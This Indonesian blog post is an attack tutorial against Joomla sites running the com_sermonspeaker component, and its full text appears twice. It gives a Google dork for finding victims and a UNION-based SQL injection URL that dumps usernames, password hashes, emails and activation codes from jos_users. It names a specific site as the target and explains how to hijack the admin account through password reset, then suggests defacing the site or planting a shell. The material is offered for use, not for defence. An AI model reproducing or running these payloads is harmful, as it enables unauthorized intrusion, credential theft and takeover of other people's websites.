=================================================
Oke langsung ke pembahasan aja yah
==================================
* Dork : inurl: option=com_sermonspeaker
==================================
* Exploit : /index.php?option=com_sermonspeaker&task=latest_sermons&id=
-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
==================================
1. Pertama cari dulu target di google.
Dork : inurl: option=com_sermonspeaker
2. Jika sudah ketemu tergetnya silahkan mencoba memasang exploit. Kali ini target kita adalah http://loichung.com
3. Langsung pasang exploit nya
=========================================
/index.php?option=com_sermonspeaker&task=latest_sermons&id=
-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
=========================================
4. Wah username, email, sama passwordnya keluar semua tuh. Buat yang mau encrypt password nya silahkan. Tapi kali ini kita akan menggunakan tekhnik lupa password.
===================================================
/index.php?option=com_user&view=reset
===================================================
Tinggal masukin email admin nya
5. Terus tekan submit dan akan muncul seperti ini
Wah minta activation code, harus gimana nih ?
Tenang aja monggo kita cari(aktivasinya
Tambahkan ,0x3a,activation setelah 0x3a,email jadinya seperti ini
============================================================
/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email,0x3a,activation)/**/from/**/jos_users/**/
============================================================
Jika kita sudah menambahkan ,0x3a,activation setelah 0x3a,email maka akan muncul seperti ini
Wah activation code nya keluar tuh sekarang tinggal kita paste aja activation code nya
6. Sekarang tekan lagi submit maka akan muncul seperti ini
Nah sekarang silahkan masukkan password baru sesuai keinginan kita. Setelah itu tekan submit lagi.
7. Sekarang kita login as admin melalui
==================================
http://[site]/[pacth]/administrator
==================================
Masukkan username admin dan password admin.
Dan sekarang kita sudah berhasil login sebagai Super Administrator dan kita berhak melakukan apapun di site tersebut. Untuk selanjutnya silahkan anda lanjutkan.
Entah site itu mau anda
* Deface Indexnya
* Tanam shell
* Dll
Hanya itu tutor yang dapat saya berikan. Lebih dan kurang terima kasih. saya juga masih belajar ^_^ biar ga jauh saya nyari tutor di google :D
Description: Step by step Exploit Joomla
Rating: 5
Reviewer: Unknown -
ItemReviewed: Step by step Exploit Joomla
Oke langsung ke pembahasan aja yah
==================================
* Dork : inurl: option=com_sermonspeaker
==================================
* Exploit : /index.php?option=com_sermonspeaker&task=latest_sermons&id=
-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
==================================
1. Pertama cari dulu target di google.
Dork : inurl: option=com_sermonspeaker
2. Jika sudah ketemu tergetnya silahkan mencoba memasang exploit. Kali ini target kita adalah http://loichung.com
3. Langsung pasang exploit nya
=========================================
/index.php?option=com_sermonspeaker&task=latest_sermons&id=
-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
=========================================
4. Wah username, email, sama passwordnya keluar semua tuh. Buat yang mau encrypt password nya silahkan. Tapi kali ini kita akan menggunakan tekhnik lupa password.
===================================================
/index.php?option=com_user&view=reset
===================================================
Tinggal masukin email admin nya
5. Terus tekan submit dan akan muncul seperti ini
Wah minta activation code, harus gimana nih ?
Tenang aja monggo kita cari(aktivasinya
Tambahkan ,0x3a,activation setelah 0x3a,email jadinya seperti ini
============================================================
/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email,0x3a,activation)/**/from/**/jos_users/**/
============================================================
Jika kita sudah menambahkan ,0x3a,activation setelah 0x3a,email maka akan muncul seperti ini
Wah activation code nya keluar tuh sekarang tinggal kita paste aja activation code nya
6. Sekarang tekan lagi submit maka akan muncul seperti ini
Nah sekarang silahkan masukkan password baru sesuai keinginan kita. Setelah itu tekan submit lagi.
7. Sekarang kita login as admin melalui
==================================
http://[site]/[pacth]/administrator
==================================
Masukkan username admin dan password admin.
Dan sekarang kita sudah berhasil login sebagai Super Administrator dan kita berhak melakukan apapun di site tersebut. Untuk selanjutnya silahkan anda lanjutkan.
Entah site itu mau anda
* Deface Indexnya
* Tanam shell
* Dll
Hanya itu tutor yang dapat saya berikan. Lebih dan kurang terima kasih. saya juga masih belajar ^_^ biar ga jauh saya nyari tutor di google :D
.jpg)
0 komentar sobat dream cyber comunity :
Posting Komentar
komentar yang tidak sopan akan di hapus...terima kasih :-*